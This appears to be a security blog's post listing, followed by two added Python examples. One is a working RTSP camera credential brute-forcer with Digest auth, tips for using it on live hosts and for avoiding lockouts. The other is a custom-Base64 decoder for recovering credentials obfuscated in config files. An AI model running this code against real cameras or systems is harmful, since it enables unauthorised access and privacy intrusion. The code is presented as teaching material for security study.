FLACK – A Practical Approach To Application Logging For Security

Introduction. Modern development practices have minimized application logging in production environments. Many factors have contributed to this, including: rapid prototype-to-development practices that ignore adding practical production logging; a myopic focus on optimized, resource-minimal code that treats logging as a burden; and comment-less, log-less development styles that focus on pumping out code, not errata. Regardless of […]

Coding for Security – Some Developer Pitfalls

Over the next few weeks, I will be releasing some teaser information from my talk, “Secure Coding: What “Bad Guy” Wants You To Do”. It's an hour-long talk I am available to give to any organization. Please contact me to book a time. Background: this talk takes a less traditional approach to talking about secure […]

Good technical article on the hazards of HID (Human Interface Devices)

Below is a link to a good (technical) article on some of the new nefarious things one can do by using HID (Human Interface Device) attack vectors. For those of you non-technical (and maybe even a few technical) types: gone are the days when USB and other storage media drives were the “hack” of the day. […]

RTSP Brute Forcing for fun and naked pictures?

RTSP, the Real Time Streaming Protocol, is a protocol largely ignored these days. Once the infrastructure relied upon in the early days of multimedia (video), and developed by RealNetworks (with Netscape and Columbia University; standardized in RFC 2326), RTSP resides largely in the background of the common protocols we pay attention to as InfoSec professionals. Typically found on TCP port 554, RTSP is still a […]
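Credential checking against RTSP works the same way as against HTTP: the client sends a DESCRIBE, the server answers 401 with a WWW-Authenticate challenge (Basic or, far more often on cameras, Digest), and the client retries with an Authorization header. The following is an added example, not code from this blog or from any tool it links to; the camera is simulated in-process by a constructed fake_camera function, and the account admin/s3cret, the realm, nonce and the RFC 5737 address 192.0.2.10 are all made up for the demonstration. Digest is computed per RFC 2617 without qop, which is what most embedded devices send.

```python
import base64
import hashlib
import re

# Constructed stand-in for a camera account and its Digest challenge (not a real device)
VALID_USER, VALID_PASS = "admin", "s3cret"
CHALLENGE = 'Digest realm="IPCam", nonce="0a1b2c3d4e5f"'
TARGET = "rtsp://192.0.2.10:554/stream1"   # RFC 5737 documentation address, hypothetical


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def build_describe(url: str, cseq: int, authorization: str = None) -> str:
    """DESCRIBE is the first request a client sends; it is enough to test credentials."""
    lines = [f"DESCRIBE {url} RTSP/1.0", f"CSeq: {cseq}"]
    if authorization:
        lines.append(f"Authorization: {authorization}")
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_message(raw: str):
    """Split an RTSP request or response into (start line, header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def basic_header(user: str, pwd: str) -> str:
    return "Basic " + base64.b64encode(f"{user}:{pwd}".encode()).decode()


def digest_header(user: str, pwd: str, method: str, uri: str, challenge: str) -> str:
    """RFC 2617 Digest without qop: response = MD5(HA1:nonce:HA2)."""
    params = dict(re.findall(r'(\w+)="([^"]*)"', challenge))
    ha1 = md5hex(f"{user}:{params['realm']}:{pwd}")
    ha2 = md5hex(f"{method}:{uri}")
    response = md5hex(f"{ha1}:{params['nonce']}:{ha2}")
    return (f'Digest username="{user}", realm="{params["realm"]}", '
            f'nonce="{params["nonce"]}", uri="{uri}", response="{response}"')


def authorization_for(challenge: str, user: str, pwd: str, method: str, uri: str) -> str:
    """Pick the scheme the server asked for; refuse anything else rather than guess."""
    scheme = challenge.split(None, 1)[0].lower()
    if scheme == "basic":
        return basic_header(user, pwd)
    if scheme == "digest":
        return digest_header(user, pwd, method, uri, challenge)
    raise ValueError(f"unsupported auth scheme: {scheme}")


def fake_camera(request: str) -> str:
    """Simulated server side of the exchange (constructed); swap in a socket for a live host."""
    start, headers, _ = parse_message(request)
    method, uri, _ = start.split(" ", 2)
    cseq = headers.get("cseq", "0")
    expected = digest_header(VALID_USER, VALID_PASS, method, uri, CHALLENGE)
    if headers.get("authorization") == expected:
        return f"RTSP/1.0 200 OK\r\nCSeq: {cseq}\r\nContent-Type: application/sdp\r\n\r\nv=0\r\n"
    return f"RTSP/1.0 401 Unauthorized\r\nCSeq: {cseq}\r\nWWW-Authenticate: {CHALLENGE}\r\n\r\n"


def check_credentials(user: str, pwd: str, url: str = TARGET, send=fake_camera) -> bool:
    """One attempt: unauthenticated DESCRIBE, read the challenge, retry with Authorization."""
    start, headers, _ = parse_message(send(build_describe(url, 1)))
    status = int(start.split()[1])
    if status == 200:
        return True                      # stream is open; no credentials needed at all
    if status != 401 or "www-authenticate" not in headers:
        raise RuntimeError(f"unexpected reply: {start}")
    auth = authorization_for(headers["www-authenticate"], user, pwd, "DESCRIBE", url)
    start, _, _ = parse_message(send(build_describe(url, 2, auth)))
    return start.split()[1] == "200"


if __name__ == "__main__":
    # Constructed candidate list; a real run would read a wordlist
    for user, pwd in [("admin", "admin"), ("admin", "12345"), ("admin", "s3cret")]:
        print(f"{user}:{pwd} -> {'valid' if check_credentials(user, pwd) else 'rejected'}")
```

Against a real device, `send` would be a function that writes the request to a socket opened with `socket.create_connection((host, 554))` and returns the reply text; note that a fresh connection per attempt is the safer choice, since many cameras drop the session after a failed Authorization and some throttle or lock out after a few failures.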

Hacker Diaries: Base 64 Hacking

Recently I ran into some database connectors that were obfuscated in the configuration file. I ran typical Base64, UUEncode, etc. techniques to reverse the obfuscation, but nothing worked. Then a co-worker of mine mentioned, “yeah, it's probably Base64, but they used a different indexing scheme”. Good point! Sometimes we get so used to […]
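A "different indexing scheme" means the 6-bit groups are the same but the 64 symbols are permuted, so a stock decoder produces garbage. The recovery is to map the custom symbols back onto the standard alphabet and then decode normally; the quick tell that the alphabet differs is a blob containing characters outside the standard set. The following is an added example, not code from this post: the sample connection string, the rotated alphabet and the candidate list are constructed here for the demonstration, and the guesser goes a little beyond the post by trying every rotation of the standard table, a common lazy obfuscation.

```python
import base64
import string

# Standard RFC 4648 alphabet; a "different indexing scheme" is any permutation of it
STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def decode_custom_b64(data: str, alphabet: str, pad: str = "=") -> bytes:
    """Decode Base64 text written with a non-standard 64-character alphabet.

    The bit layout never changes, only the symbol table, so translate the custom
    symbols back to the standard ones and let the stock decoder do the work.
    """
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must be 64 distinct characters")
    data = data.rstrip(pad)
    bad = {c for c in data if c not in alphabet}
    if bad:
        # Cheapest signal that this is not the alphabet you think it is
        raise ValueError(f"characters not in alphabet: {sorted(bad)}")
    translated = data.translate(str.maketrans(alphabet, STD_ALPHABET))
    translated += "=" * (-len(translated) % 4)   # restore standard padding
    return base64.b64decode(translated, validate=True)


def encode_custom_b64(raw: bytes, alphabet: str) -> str:
    """Inverse of decode_custom_b64; used here only to build the sample blob."""
    std = base64.b64encode(raw).decode("ascii").rstrip("=")
    return std.translate(str.maketrans(STD_ALPHABET, alphabet))


def candidate_alphabets():
    """Alphabets worth trying before reverse-engineering the application:
    standard, URL-safe, and every rotation of the standard table."""
    yield "standard", STD_ALPHABET
    yield "urlsafe", STD_ALPHABET[:-2] + "-_"
    for shift in range(1, 64):
        yield f"rotate{shift}", STD_ALPHABET[shift:] + STD_ALPHABET[:shift]


def guess_decode(data: str, pad: str = "="):
    """Try each candidate; accept the first that yields printable ASCII, which is
    what a connection string or password should look like. Returns (name, bytes)."""
    for name, alphabet in candidate_alphabets():
        try:
            out = decode_custom_b64(data, alphabet, pad)
        except ValueError:            # binascii.Error is a ValueError subclass
            continue
        if out and all(32 <= b < 127 for b in out):
            return name, out
    return None


# Constructed sample: a connection string hidden with the standard table rotated by 13
ROTATED = STD_ALPHABET[13:] + STD_ALPHABET[:13]
SAMPLE_SECRET = b"Server=db01;User Id=app;Password=s3cret"
SAMPLE_BLOB = encode_custom_b64(SAMPLE_SECRET, ROTATED)

if __name__ == "__main__":
    print("blob in config :", SAMPLE_BLOB)
    print("standard decode:", decode_custom_b64(SAMPLE_BLOB, STD_ALPHABET))  # garbage
    print("guessed        :", guess_decode(SAMPLE_BLOB))
```

If none of the candidates hit, the alphabet is an arbitrary permutation and the place to look is the application's own decode routine: a 64-character string constant next to a loop that shifts by 6 bits is the usual giveaway.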